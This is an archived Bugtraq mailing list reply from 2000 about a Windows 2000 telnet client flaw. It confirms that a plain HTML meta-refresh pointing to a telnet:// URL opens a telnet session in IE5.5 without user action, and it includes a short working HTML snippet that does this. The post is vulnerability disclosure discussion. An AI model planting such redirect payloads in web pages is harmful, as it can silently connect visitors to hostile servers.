Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability
From: Micah Webner <micah () SYSTIME COM>
Date: Thu, 14 Sep 2000 10:34:30 -0400

----- Original Message -----
From: "monti" <monti () USHOST COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, September 13, 2000 4:13 PM
Subject: Win2k Telnet.exe malicious server vulnerability


I would speculate that it might also be possible to force this to
happen without user intervention with javascript/activeX/java or
really
creative HTLM. I try really hard not to do HTLM/web-code anymore
unless
it's really necessary so I didnt test this.

I tested this with IE5.5 and a simple http refresh, and it opened a
telnet window.

     <html><head>
     <meta http-equiv="refresh"
content="0;URL=telnet://sometelnetserver">
     </head>
     </html>

Didn't even need jscript/ActiveX/java to pull it off.

Micah


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]